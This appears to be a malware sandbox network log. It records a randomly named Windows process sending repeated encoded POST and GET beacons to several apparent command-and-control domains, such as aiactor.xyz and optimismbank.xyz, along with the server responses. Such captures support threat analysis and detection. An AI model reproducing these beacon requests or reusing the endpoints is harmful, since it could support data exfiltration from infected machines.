                                                                                  Nov 20, 2024 08:34:39.543355942 CET | 1844 | OUT | POST /g2y0/ HTTP/1.1
                                                                                  Host: www.aiactor.xyz
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 1249
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.aiactor.xyz
                                                                                  Referer: http://www.aiactor.xyz/g2y0/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Ascii: GR54yHZ8=1Le5toim1kD1C2XAt3+QlSgIrBx9I/wRAI+Di7WxLX0/KyluT0n2pjeJGIDBqqQaIJAOCTFklSvvadXTiTbIPj55X9v1LZg8ScpdQBPznKOMq8WuNtgX5xdq032DSJaxUfgROYt7icAKEarXyJPVXXZiha61Lf/eiRG4XSpjW3v98p3pgTyNqEtR+K073YCcyEMIwUofvq45mmLziO9T8VitBLAG6EtzuUHY3DbsGQniFZZtVQ5lsNFo6RcN+OJ4yIoCTFRJfvjYrmvIG/pN08A4VJ9uhMp+Rp8SrNkyMg7NJoI08hfYTjoG2cFVEm18VEQJNjM/RJ3vk9Z84dn3ffs9R/+dLgyEYP+HlMiHDiAxiEyxro0qvdgoaD563O5c/INeq0/jBYzQ9DeJbXV3N2VBWctctDGWmCd+L9dsL42Hv80SfVWMsk4L6pXkA8x9CsaDpJ1DapaarbVs+mDKcGTUhDSaKHQjd+Qu3e/My1IgrrhJhugIoZH5RLv5Tne47ZKGkQA1RTHzaY0QU13wYaynpTmAHdH6x6XjOlCG7n1QVZiMf6KnM4fOqnhn1okqYGjq22gL6BPFWMujd7HJXhRq1uOJ1Q8GmRff0bUOY9FW8m3K5Jkrqx+9Y6NRIBVQ4pBQrTydz1elL3rsOFl5uPQ31O4SZLihnD9C/aTGzGehZqa6Vm6DGtXCUct1q0xMpIh6tPoJK68ux+61U1UDoQIXcuJ/iETqYY2Kq6x3IWc3PrbJZRBpPElwBGZJPVcc18Me1olseUSNSvicMNbMMIkABgT4F76fbMYMCrEQxyXSxSjppJ0tBFSJW/8RAVZtFA8Eo2JO0jS9+sGYgZvyBpP4EAlPYPJlcE2K0YgfbPuafd5UpTa0BDEkBFb8UHkT16ZnNl7ywWaVHAbN/ULId3qu7ZTwoqe/GY7dFce/wmBsiqJCbF+M3T2dNvZJv29lnAxCGSfoBYXLs0D3z2ZXdzyMI5lummTE/FXgyUJEOSU [TRUNCATED]


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  48 | 192.168.2.6 | 50038 | 13.248.169.48 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 20, 2024 08:34:42.081414938 CET | 553 | OUT | GET /g2y0/?GR54yHZ8=4J2ZucS0gmHveCLTumStwhEohSgzPPJ4W7Cx1bvPckMEbjsLQyn2mnrwN7XguYk0KfYRNkJmpBfqbfzPpDbCYGkLQdnxWLNNRJRrSDnZ+4vw6seRBsYWgxI51lS2SbfnTvxGN+Y=&9xn=fHadNpk8MVax HTTP/1.1
                                                                                  Host: www.aiactor.xyz
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Nov 20, 2024 08:34:42.532031059 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Wed, 20 Nov 2024 07:34:42 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 277
                                                                                  Connection: close
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?GR54yHZ8=4J2ZucS0gmHveCLTumStwhEohSgzPPJ4W7Cx1bvPckMEbjsLQyn2mnrwN7XguYk0KfYRNkJmpBfqbfzPpDbCYGkLQdnxWLNNRJRrSDnZ+4vw6seRBsYWgxI51lS2SbfnTvxGN+Y=&9xn=fHadNpk8MVax"}</script></head></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  49 | 192.168.2.6 | 50039 | 172.67.162.39 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 20, 2024 08:34:47.619359970 CET | 822 | OUT | POST /arvb/ HTTP/1.1
                                                                                  Host: www.sitioseguro.blog
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 213
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.sitioseguro.blog
                                                                                  Referer: http://www.sitioseguro.blog/arvb/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Ascii: GR54yHZ8=UD4wpGPOeOKLP64tExqaT0Tzi68M+dWcXeZr1tK431hmJtaxGmjcN8umlfB70/xwJXIW5m6pjyh3sSkHQZAWqNFOaMqKrwYePluspxJS2nMrFBpErnzlCsl5x2wBxBWCRbD5huwGcWGt4tqDnpk9YIUYQUrXxgo7biQzDoyrojWaH5d4qZvuOE3XvHsLGVvabsy5tA/J1P2Z
                                                                                  Nov 20, 2024 08:34:48.132668018 CET | 1236 | IN | HTTP/1.1 405 Not Allowed
                                                                                  Date: Wed, 20 Nov 2024 07:34:48 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mDguE102mRMaAUZbJiD2y9jJIfLAcnGhF0AB6BxL%2FNvnD7SLNEjmLk38XlTqsdMD3LQD4v%2FgpogAiSvlA9dzQbLH5ByMKX6ZFpOgvGVN9rWAXxq4jxt8%2BxgTErRWUZedr9ow9UskXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e56c27608077c6a-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2049&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=822&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly
                                                                                  Nov 20, 2024 08:34:48.132721901 CET90INData Raw: 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d
                                                                                  Data Ascii: error page -->... a padding to disable MSIE and Chrome friendly error page -->0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.6 | 50040 | 172.67.162.39 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 08:34:50.204757929 CET | 846 | OUT | POST /arvb/ HTTP/1.1
    Host: www.sitioseguro.blog
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Accept-Encoding: gzip, deflate, br
    Connection: close
    Content-Length: 237
    Content-Type: application/x-www-form-urlencoded
    Cache-Control: max-age=0
    Origin: http://www.sitioseguro.blog
    Referer: http://www.sitioseguro.blog/arvb/
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
    Data Ascii: GR54yHZ8=UD4wpGPOeOKLOfotGQqaVUTsta8MktWYXeFr1oz93nVmJPyxHjPcM8umt/B67fxvJW0g5k+pjy13sQMHQusRrdEoTsqEkQYePluspxc32n0rFx5ErFbqBsl6mGwBnxWGRbDbhsFjcQKt4puDnYk+SIUaf0qa4Q5+XgVxJeeUoiG5PvAi2qvNcUXVvF05G1vwZsK5/Xzu67T6k1PiOOmXCJAWWG44N3U2FA==
Nov 20, 2024 08:34:50.722913027 CET | 1236 | IN | HTTP/1.1 405 Not Allowed
    Date: Wed, 20 Nov 2024 07:34:50 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P07bnp%2BSyO9vb0erM0IpuqnUhwDShPVOuJ8koO%2FXvM2DOLYmvcXMPosuNCFzfKLuSOBjTuO5dTmwoY%2Ft1VxJFMHgAC%2BFY45E%2BOnH4K4gHYzmcwaw10zdIco7m5%2F3fqNerdLTHT0pYg%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8e56c2862eed5e5f-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1550&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=846&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
    Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome fri
Nov 20, 2024 08:34:50.722997904 CET | 96 | IN | Data Ascii: endly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.6 | 50041 | 172.67.162.39 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 08:34:52.758469105 CET | 1859 | OUT | POST /arvb/ HTTP/1.1
    Host: www.sitioseguro.blog
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Accept-Encoding: gzip, deflate, br
    Connection: close
    Content-Length: 1249
    Content-Type: application/x-www-form-urlencoded
    Cache-Control: max-age=0
    Origin: http://www.sitioseguro.blog
    Referer: http://www.sitioseguro.blog/arvb/
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
    Data Ascii: GR54yHZ8= [TRUNCATED]
Nov 20, 2024 08:34:53.275191069 CET | 1236 | IN | HTTP/1.1 405 Not Allowed
    Date: Wed, 20 Nov 2024 07:34:53 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FgGas7RfuTt8VXnl9rLo%2BkFAyMOauGoS026PjdFO2%2F5MSRNiE4mev%2FZr13WV9562hIaQ2I5LTCHpXR6PRbMnXrnd29npnGbcWgU7RhAIiIIHXydul3gjA6KoyXEJ2l7CASl2emP8hA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8e56c2961ae0423b-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1599&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1859&delivery_rate=0&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
    Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friend
Nov 20, 2024 08:34:53.275213003 CET | 93 | IN | Data Ascii: ly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.6 | 50043 | 172.67.162.39 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 08:34:55.305727005 CET | 558 | OUT | GET /arvb/?GR54yHZ8=ZBQQqxbud8SVIvMkbBf/fVH1me8478TvMeRY2MiH3kRRc/z7OAWaNoWdi819/s5bJQ0i5xulgwkm2DEXU68//topbf+A00Q8GVm5yCYkyRQ3ElhjsG3EX+N+jW0L22iONcil9J4=&9xn=fHadNpk8MVax HTTP/1.1
    Host: www.sitioseguro.blog
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Nov 20, 2024 08:34:55.824734926 CET | 1236 | IN | HTTP/1.1 200 OK
    Date: Wed, 20 Nov 2024 07:34:55 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
    Accept-Ranges: bytes
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2IbFCCEqn4qLUSz%2BDdu3a33IFQl5F%2BHhPAVPGmv7haezXLt8rcMymv1DfiYOC6SHZrzAkRBfVw6Ok8WEvbRRvgxCVp4u24nOWcJkqIDs5bOH8uGdfJKpngvoymWve0O%2BkM2Bmode5g%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8e56c2a61fab4258-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2004&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=558&delivery_rate=0&cwnd=184&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
    Data Ascii: 2dae<!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex,nofollow"><style>@import url('https://fonts.googleapis.com/css?family=Roboto:regular,500&display=swap');::after,::before,a,label{display:inline-block}.ma
Nov 20, 2024 08:34:55.824788094 CET | 1236 | IN | Data Ascii: in,.wrapper{flex-direction:column}.window-main,.window-main__item{position:relative}*{padding:0;margin:0;border:0}*,::after,::before{box-sizing:border-box}body,html{height:100%;min-width:320px}body{color:#fff;line-height:1;font-family:Roboto;f
Nov 20, 2024 08:34:55.824821949 CET | 1236 | IN | Data Ascii: p:-240px;right:-360px;z-index:-1}.window-main .svg-two{position:absolute;bottom:-258px;left:-223px;z-index:-1}.window-main__title{text-align:center;padding-bottom:1.875rem;position:relative;font-weight:500;line-height:1.2777777778}.window-main
Nov 20, 2024 08:34:55.824857950 CET | 672 | IN | Data Ascii: main__item{padding-left:.875rem}}@media (max-width:20em){.window-main{padding:1.5rem}.window-main__title{font-size:1.5rem}.window-main__body{margin-top:1.5rem;font-size:.875rem}.window-main__info{margin-bottom:1.5rem}.window-main__list{padding
Nov 20, 2024 08:34:55.824889898 CET | 1236 | IN | Data Ascii: @supports not (padding-left:clamp(1.5rem ,-4.3048780488rem + 29.0243902439vw ,8.9375rem)){.window-main{padding-left:calc(1.5rem + 7.4375*(100vw - 20rem)/ 25.625)}}@supports (padding-right:clamp(1.5rem ,-4.3048780488rem + 29.0243902439vw ,8.937
Nov 20, 2024 08:34:55.824922085 CET | 1236 | IN | Data Ascii: ow-main__title{font-size:clamp(1.5rem ,.9146341463rem + 2.9268292683vw ,2.25rem)}}@supports not (font-size:clamp(1.5rem ,0.9146341463rem + 2.9268292683vw ,2.25rem)){.window-main__title{font-size:calc(1.5rem + .75*(100vw - 20rem)/ 25.625)}}@sup
Nov 20, 2024 08:34:55.824956894 CET | 1236 | IN | Data Ascii: 00vw - 20rem)/ 25.625)}}@supports (padding-left:clamp(0.75rem ,0.6524390244rem + 0.487804878vw ,0.875rem)){.window-main__item{padding-left:clamp(.75rem ,.6524390244rem + .487804878vw ,.875rem)}}@supports not (padding-left:clamp(0.75rem ,0.6524
Nov 20, 2024 08:34:55.825069904 CET | 1236 | IN | Data Ascii: 61 287.368 285.228 259.25C319.696 231.133 363.018 262.356 381.991 328.99C287.99 418.472 360.522 563.421 360.522 563.421Z" fill="#00498D" /></g><g opacity="0.7" filter="url(#filter1_f_2001_5)"><ellipse cx="50.6112" cy="60.
Nov 20, 2024 08:34:55.825103045 CET | 1236 | IN | Data Ascii: aceOnUse" color-interpolation-filters="sRGB"><feFlood flood-opacity="0" result="BackgroundImageFix" /><feBlend mode="normal" in="SourceGraphic" in2="BackgroundImageFix" result="shape" /><feGaussianBlur stdDeviation="
Nov 20, 2024 08:34:55.825136900 CET | 552 | IN | Data Ascii: SSL certificate installed.</li><li class="window-main__item">Your domain has an AAAA record, but the site only works with IPv4 on the server.</li></ul></div><div class="window-main__actions"><a href="https://
Nov 20, 2024 08:34:55.829943895 CET | 1236 | IN | Data Ascii: 12.534" cy="134.299" rx="112.534" ry="134.299" transform="matrix(-0.916366 0.400341 -0.15071 -0.988578 379.183 586.577)" fill="#15B1F9" /></g><g opacity="0.8" filter="url(#filter1_f_2001_10)"><path d="M259.743 638.552C361


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.6 | 50044 | 13.248.169.48 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 08:35:00.930579901 CET | 822 | OUT | POST /lnyv/ HTTP/1.1
    Host: www.optimismbank.xyz
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Accept-Encoding: gzip, deflate, br
    Connection: close
    Content-Length: 213
    Content-Type: application/x-www-form-urlencoded
    Cache-Control: max-age=0
    Origin: http://www.optimismbank.xyz
    Referer: http://www.optimismbank.xyz/lnyv/
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
    Data Ascii: GR54yHZ8=ECOol4ZZ4iGTfWf0IvZBz946215FcYKEftTtYV+9Sod+mQmNK2OVj4tzzVinUNCeEKhxA2mXbtMdPvpBP2T3qW8zRhiNWKWFQdEhi0zE3gbBKzHggl5HJkdZkjPV/AbTWAdvcd7wvMKQcmjJk5qr0fxgk9TJpVO6kWDYyMyaWX/RQoLMknM37z4tYv1uXjlQB+81P9hqSA1W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.6 | 50045 | 13.248.169.48 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 08:35:03.477396011 CET | 846 | OUT | POST /lnyv/ HTTP/1.1
    Host: www.optimismbank.xyz
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Accept-Encoding: gzip, deflate, br
    Connection: close
    Content-Length: 237
    Content-Type: application/x-www-form-urlencoded
    Cache-Control: max-age=0
    Origin: http://www.optimismbank.xyz
    Referer: http://www.optimismbank.xyz/lnyv/
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
    Data Ascii: GR54yHZ8=ECOol4ZZ4iGTf2v0bcBB1d455V5FHoKAftftYQHiTb5+nzyNFUmVi4tz81imX9CVEKtmA3aXbuwdPuZBPFL0sW8mQRiPSKWFQdEhi02R3gDBKDXghE5YXUdWzTPVpwbfWAdZccnKvPyQcinJ9MGk6fxmqdSfk2fsiwW40qaHQQ/5VeWW4UMUpjYvYttcXDl6D+E1dqtNd0Q1577pv3q7g/VXQzQnwyLwTg==


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  55 | 192.168.2.6 | 50046 | 13.248.169.48 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 20, 2024 08:35:06.026964903 CET | 1859 | OUT | POST /lnyv/ HTTP/1.1
                                                                                  Host: www.optimismbank.xyz
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 1249
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.optimismbank.xyz
                                                                                  Referer: http://www.optimismbank.xyz/lnyv/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 45 43 4f 6f 6c 34 5a 5a 34 69 47 54 66 32 76 30 62 63 42 42 31 64 34 35 35 56 35 46 48 6f 4b 41 66 74 66 74 59 51 48 69 54 62 78 2b 6e 44 75 4e 4b 54 53 56 34 34 74 7a 31 56 69 72 58 39 43 79 45 4b 30 4f 41 33 57 68 62 6f 30 64 50 4d 68 42 59 45 4c 30 2f 32 38 6d 56 68 69 4b 57 4b 57 71 51 64 55 6c 69 30 6d 52 33 67 44 42 4b 42 66 67 6c 56 35 59 56 55 64 5a 6b 6a 50 6a 2f 41 61 49 57 41 46 6e 63 64 53 31 76 2f 53 51 63 47 44 4a 6d 61 53 6b 6c 50 78 6b 74 64 53 58 6b 32 53 79 69 30 32 43 30 75 61 68 51 58 2f 35 56 59 66 4a 6c 77 55 76 36 69 74 4e 41 4e 49 39 50 6d 70 6a 45 2b 51 56 65 4a 4e 59 63 6e 59 66 68 64 72 4b 35 31 6a 57 6a 5a 39 4f 58 55 46 34 79 77 65 6e 45 45 2f 6a 75 51 55 46 65 61 35 59 48 6c 77 54 51 5a 32 36 31 6f 79 4d 67 32 39 33 55 52 6d 54 74 7a 47 45 50 48 33 55 65 4a 34 30 62 2b 33 2b 75 73 4e 52 64 6c 76 51 63 78 42 37 5a 6a 76 39 6d 63 47 73 72 30 34 54 74 48 61 45 48 77 2b 42 78 36 32 63 71 62 4f 7a 48 74 39 47 5a 5a 33 50 42 34 46 5a 70 48 34 6b 2f [TRUNCATED]
                                                                                  Data Ascii: GR54yHZ8= [TRUNCATED]


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  56 | 192.168.2.6 | 50047 | 13.248.169.48 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 20, 2024 08:35:08.565615892 CET | 558 | OUT | GET /lnyv/?GR54yHZ8=JAmImNl6mB+RRlbpbvR3+e423BtxCo3/O8+kCBnAAYB05gHtC1vk8aJbyHyeZvKMcMp3FBCqV/xfRsVXPWDfq0wzcDycBqeORKYOzEG12hWJCinHhVNRLnpziyzgvH+OTjwtfrk=&9xn=fHadNpk8MVax HTTP/1.1
                                                                                  Host: www.optimismbank.xyz
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Nov 20, 2024 08:35:09.013777971 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Wed, 20 Nov 2024 07:35:08 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 277
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 47 52 35 34 79 48 5a 38 3d 4a 41 6d 49 6d 4e 6c 36 6d 42 2b 52 52 6c 62 70 62 76 52 33 2b 65 34 32 33 42 74 78 43 6f 33 2f 4f 38 2b 6b 43 42 6e 41 41 59 42 30 35 67 48 74 43 31 76 6b 38 61 4a 62 79 48 79 65 5a 76 4b 4d 63 4d 70 33 46 42 43 71 56 2f 78 66 52 73 56 58 50 57 44 66 71 30 77 7a 63 44 79 63 42 71 65 4f 52 4b 59 4f 7a 45 47 31 32 68 57 4a 43 69 6e 48 68 56 4e 52 4c 6e 70 7a 69 79 7a 67 76 48 2b 4f 54 6a 77 74 66 72 6b 3d 26 39 78 6e 3d 66 48 61 64 4e 70 6b 38 4d 56 61 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?GR54yHZ8=JAmImNl6mB+RRlbpbvR3+e423BtxCo3/O8+kCBnAAYB05gHtC1vk8aJbyHyeZvKMcMp3FBCqV/xfRsVXPWDfq0wzcDycBqeORKYOzEG12hWJCinHhVNRLnpziyzgvH+OTjwtfrk=&9xn=fHadNpk8MVax"}</script></head></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
